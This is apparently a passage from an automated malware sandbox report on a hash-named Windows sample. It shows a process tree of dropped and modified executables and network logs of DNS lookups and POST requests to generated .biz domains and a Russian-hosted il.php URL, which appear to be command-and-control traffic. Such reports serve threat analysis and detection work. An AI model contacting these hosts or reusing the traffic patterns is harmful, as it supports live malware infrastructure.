            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 3a4 -NGENProcess 35c -Pipe 38c -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:592
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 3a8 -NGENProcess 34c -Pipe 390 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2492
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a8 -InterruptEvent 3ac -NGENProcess 33c -Pipe 394 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2576
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3b0 -NGENProcess 35c -Pipe 398 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2000
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 3b4 -NGENProcess 34c -Pipe 39c -Comment "NGen Worker Process"
              2⤵
              • Modifies data under HKEY_USERS
              PID:1976
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b4 -InterruptEvent 3ac -NGENProcess 3b8 -Pipe 3a0 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1492
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3bc -NGENProcess 35c -Pipe 3a4 -Comment "NGen Worker Process"
              2⤵
                PID:2164
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 3c0 -NGENProcess 34c -Pipe 3a8 -Comment "NGen Worker Process"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2724
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3c0 -InterruptEvent 3c4 -NGENProcess 3b8 -Pipe 3b0 -Comment "NGen Worker Process"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2264
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 3b8 -NGENProcess 3ac -Pipe 3cc -Comment "NGen Worker Process"
                2⤵
                  PID:112
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b8 -InterruptEvent 33c -NGENProcess 3c8 -Pipe 3b4 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:236
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 3d0 -NGENProcess 3c0 -Pipe 378 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2824
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d0 -InterruptEvent 3d4 -NGENProcess 3ac -Pipe 35c -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:3064
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 3d8 -NGENProcess 3c8 -Pipe 3bc -Comment "NGen Worker Process"
                  2⤵
                  • Modifies data under HKEY_USERS
                  PID:2424
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d8 -InterruptEvent 3dc -NGENProcess 3c0 -Pipe 3c4 -Comment "NGen Worker Process"
                  2⤵
                  • Modifies data under HKEY_USERS
                  PID:1536
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 3e0 -NGENProcess 3ac -Pipe 3b8 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1636
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 3ac -NGENProcess 3e0 -Pipe 3e4 -Comment "NGen Worker Process"
                  2⤵
                    PID:2732
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3e8 -NGENProcess 3c0 -Pipe 3d0 -Comment "NGen Worker Process"
                    2⤵
                      PID:2876
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 3ec -NGENProcess 33c -Pipe 3d4 -Comment "NGen Worker Process"
                      2⤵
                        PID:2972
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 3f0 -NGENProcess 3e0 -Pipe 3d8 -Comment "NGen Worker Process"
                        2⤵
                          PID:2640
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f0 -InterruptEvent 3f4 -NGENProcess 3c0 -Pipe 3c8 -Comment "NGen Worker Process"
                          2⤵
                            PID:3016
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 3f8 -NGENProcess 33c -Pipe 3dc -Comment "NGen Worker Process"
                            2⤵
                              PID:2976
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f8 -InterruptEvent 3fc -NGENProcess 3f0 -Pipe 3ec -Comment "NGen Worker Process"
                              2⤵
                                PID:2264
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2700
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 1c4 -NGENProcess 1c8 -Pipe 1d4 -Comment "NGen Worker Process"
                                2⤵
                                • Executes dropped EXE
                                PID:1768
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 1c4 -NGENProcess 1c8 -Pipe 1d8 -Comment "NGen Worker Process"
                                2⤵
                                • Executes dropped EXE
                                PID:800
                            • C:\Windows\ehome\ehRecvr.exe
                              C:\Windows\ehome\ehRecvr.exe
                              1⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              PID:2504
                            • C:\Windows\ehome\ehsched.exe
                              C:\Windows\ehome\ehsched.exe
                              1⤵
                              • Executes dropped EXE
                              PID:2284
                            • C:\Windows\eHome\EhTray.exe
                              "C:\Windows\eHome\EhTray.exe" /nav:-2
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:568
                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:2592
                            • C:\Windows\system32\IEEtwCollector.exe
                              C:\Windows\system32\IEEtwCollector.exe /V
                              1⤵
                              • Executes dropped EXE
                              PID:2800
                            • C:\Windows\ehome\ehRec.exe
                              C:\Windows\ehome\ehRec.exe -Embedding
                              1⤵
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:800
                            • C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
                              "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:696
                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                              "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                              1⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:2572
                            • C:\Windows\System32\msdtc.exe
                              C:\Windows\System32\msdtc.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Drops file in Windows directory
                              PID:1776
                            • C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                              "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
                              1⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1668

Network

                            • flag-us
                              DNS
                              pywolwnvd.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              pywolwnvd.biz
                              IN A
                              Response
                              pywolwnvd.biz
                              IN A
                              54.244.188.177
                            • flag-us
                              POST
                              http://pywolwnvd.biz/qppwmclitvbxs
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              54.244.188.177:80
                              Request
                              POST /qppwmclitvbxs HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: pywolwnvd.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 932
                            • flag-ru
                              GET
                              http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              186.2.171.17:80
                              Request
                              GET /seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba HTTP/1.1
                              Connection: Keep-Alive
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                              Accept-Language: en-US,en;q=0.9
                              Referer: https://www.facebook.com
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                              Host: 186.2.171.17
                              Response
                              HTTP/1.1 301 Moved Permanently
                              Server: ddos-guard
                              Date: Wed, 25 Dec 2024 02:03:48 GMT
                              Connection: keep-alive
                              Keep-Alive: timeout=60
                              Set-Cookie: __ddg8_=QSAHjNl4nFPl3dKC; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Set-Cookie: __ddg9_=181.215.176.83; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Set-Cookie: __ddg10_=1735092228; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Location: https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 568
                            • flag-us
                              DNS
                              pywolwnvd.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              pywolwnvd.biz
                              IN A
                              Response
                              pywolwnvd.biz
                              IN A
                              54.244.188.177
                            • flag-ru
                              GET
                              https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              186.2.171.17:443
                              Request
                              GET /seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba HTTP/1.1
                              Connection: Keep-Alive
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                              Accept-Language: en-US,en;q=0.9
                              Referer: https://www.facebook.com
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                              Host: 186.2.171.17
                              Response
                              HTTP/1.1 502 Bad Gateway
                              Server: ddos-guard
                              Date: Wed, 25 Dec 2024 02:03:50 GMT
                              Connection: keep-alive
                              Keep-Alive: timeout=60
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 585
                            • flag-us
                              DNS
                              ssbzmoy.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ssbzmoy.biz
                              IN A
                              Response
                              ssbzmoy.biz
                              IN A
                              18.141.10.107
                            • flag-sg
                              POST
                              http://ssbzmoy.biz/g
                              alg.exe
                              Remote address:
                              18.141.10.107:80
                              Request
                              POST /g HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: ssbzmoy.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:04:29 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=13e18fd8a1cdd68cb321fbcc3e8dc82d|181.215.176.83|1735092269|1735092269|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              cvgrf.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              cvgrf.biz
                              IN A
                              Response
                              cvgrf.biz
                              IN A
                              54.244.188.177
                            • flag-us
                              DNS
                              npukfztj.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              npukfztj.biz
                              IN A
                              Response
                              npukfztj.biz
                              IN A
                              44.221.84.105
                            • flag-us
                              POST
                              http://npukfztj.biz/bwkltopmnrvvwfg
                              alg.exe
                              Remote address:
                              44.221.84.105:80
                              Request
                              POST /bwkltopmnrvvwfg HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: npukfztj.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:05:12 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=8e8a83800d0057d5c34f6b4ea423b99e|181.215.176.83|1735092312|1735092312|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              przvgke.biz
                              IN A
                              Response
                              przvgke.biz
                              IN A
                              172.234.222.143
                              przvgke.biz
                              IN A
                              172.234.222.138
                            • flag-us
                              POST
                              http://przvgke.biz/ye
                              alg.exe
                              Remote address:
                              172.234.222.143:80
                              Request
                              POST /ye HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: przvgke.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Server: openresty
                              Date: Wed, 25 Dec 2024 02:05:15 GMT
                              Content-Type: text/html
                              Content-Length: 142
                              Connection: keep-alive
                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                              Location: http://ww99.przvgke.biz/ye
                              Cache-Control: no-store, max-age=0
                            • flag-us
                              POST
                              http://przvgke.biz/tloyfjsdxsgslusj
                              alg.exe
                              Remote address:
                              172.234.222.143:80
                              Request
                              POST /tloyfjsdxsgslusj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: przvgke.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Server: openresty
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 142
                              Connection: keep-alive
                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                              Location: http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              Cache-Control: no-store, max-age=0
                            • flag-us
                              DNS
                              ww99.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww99.przvgke.biz
                              IN A
                              Response
                              ww99.przvgke.biz
                              IN A
                              72.52.179.174
                            • flag-us
                              GET
                              http://ww99.przvgke.biz/ye
                              alg.exe
                              Remote address:
                              72.52.179.174:80
                              Request
                              GET /ye HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww99.przvgke.biz
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 0
                              Connection: keep-alive
                              Location: http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Access-Control-Allow-Origin: *
                            • flag-us
                              GET
                              http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              alg.exe
                              Remote address:
                              72.52.179.174:80
                              Request
                              GET /tloyfjsdxsgslusj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww99.przvgke.biz
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 0
                              Connection: keep-alive
                              Location: http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Access-Control-Allow-Origin: *
                            • flag-us
                              DNS
                              ww7.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww7.przvgke.biz
                              IN A
                              Response
                              ww7.przvgke.biz
                              IN CNAME
                              76899.bodis.com
                              76899.bodis.com
                              IN A
                              199.59.243.227
                            • flag-us
                              GET
                              http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              alg.exe
                              Remote address:
                              199.59.243.227:80
                              Request
                              GET /ye?usid=24&utid=9739925920 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww7.przvgke.biz
                              Response
                              HTTP/1.1 200 OK
                              date: Wed, 25 Dec 2024 02:05:16 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1130
                              x-request-id: 3853e633-86a7-42d8-89b1-25d8d9b17e75
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vDwtkTrHiBuc++9nCFEFKA7iuNQLByHpA+wdsnlsp70UN3aOayn/XvvYV0dP8ki1qhl1vBt3ibCg4j936/Ncvw==
                              set-cookie: parking_session=3853e633-86a7-42d8-89b1-25d8d9b17e75; expires=Wed, 25 Dec 2024 02:20:16 GMT; path=/
                            • flag-us
                              DNS
                              ww12.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww12.przvgke.biz
                              IN A
                              Response
                              ww12.przvgke.biz
                              IN CNAME
                              084725.parkingcrew.net
                              084725.parkingcrew.net
                              IN A
                              76.223.26.96
                              084725.parkingcrew.net
                              IN A
                              13.248.148.254
                            • flag-us
                              GET
                              http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              alg.exe
                              Remote address:
                              76.223.26.96:80
                              Request
                              GET /tloyfjsdxsgslusj?usid=24&utid=9739926020 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww12.przvgke.biz
                              Response
                              HTTP/1.1 200 OK
                              Accept-Ch: viewport-width
                              Accept-Ch: dpr
                              Accept-Ch: device-memory
                              Accept-Ch: rtt
                              Accept-Ch: downlink
                              Accept-Ch: ect
                              Accept-Ch: ua
                              Accept-Ch: ua-full-version
                              Accept-Ch: ua-platform
                              Accept-Ch: ua-platform-version
                              Accept-Ch: ua-arch
                              Accept-Ch: ua-model
                              Accept-Ch: ua-mobile
                              Accept-Ch-Lifetime: 30
                              Content-Type: text/html; charset=UTF-8
                              Date: Wed, 25 Dec 2024 02:05:17 GMT
                              Server: Caddy
                              Server: nginx
                              Vary: Accept-Encoding
                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SEVcTO7aRxFtSwdoptOjKndGd8cxe3TY8RePnTlGQ70cDNZYPiYAfnf/gQnEPdnIbneh+Rl2+W8Qf5kswIVAGQ==
                              X-Buckets: bucket003
                              X-Domain: przvgke.biz
                              X-Language: english
                              X-Pcrew-Blocked-Reason: hosting network
                              X-Pcrew-Ip-Organization: Cogent Communications
                              X-Subdomain: ww12
                              X-Template: tpl_CleanPeppermintBlack_twoclick
                              Transfer-Encoding: chunked
                            • flag-us
                              DNS
                              zlenh.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              zlenh.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              knjghuig.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              knjghuig.biz
                              IN A
                              Response
                              knjghuig.biz
                              IN A
                              18.141.10.107
                            • flag-sg
                              POST
                              http://knjghuig.biz/eovjrsnxfvivsmj
                              alg.exe
                              Remote address:
                              18.141.10.107:80
                              Request
                              POST /eovjrsnxfvivsmj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: knjghuig.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:05:17 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=43876e65d76ed96c1e5e235640031d88|181.215.176.83|1735092317|1735092317|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              uhxqin.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              uhxqin.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              anpmnmxo.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              anpmnmxo.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              lpuegx.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              lpuegx.biz
                              IN A
                              Response
                              lpuegx.biz
                              IN A
                              82.112.184.197
                            • flag-us
                              DNS
                              vjaxhpbji.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              vjaxhpbji.biz
                              IN A
                              Response
                              vjaxhpbji.biz
                              IN A
                              82.112.184.197
                            • 54.244.188.177:80
                              http://pywolwnvd.biz/qppwmclitvbxs
                              http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              6.9kB
                              260 B
                              14
                              5

                              HTTP Request

                              POST http://pywolwnvd.biz/qppwmclitvbxs
                            • 186.2.171.17:80
                              http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              803 B
                              2.5kB
                              7
                              4

                              HTTP Request

                              GET http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

                              HTTP Response

                              301
                            • 54.244.188.177:80
                              pywolwnvd.biz
                              alg.exe
                              152 B
                              3
                            • 186.2.171.17:443
                              https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              tls, http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              1.1kB
                              2.3kB
                              8
                              6

                              HTTP Request

                              GET https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

                              HTTP Response

                              502
                            • 54.244.188.177:80
                              pywolwnvd.biz
                              alg.exe
                              144 B
                              3
                            • 18.141.10.107:80
                              http://ssbzmoy.biz/g
                              http
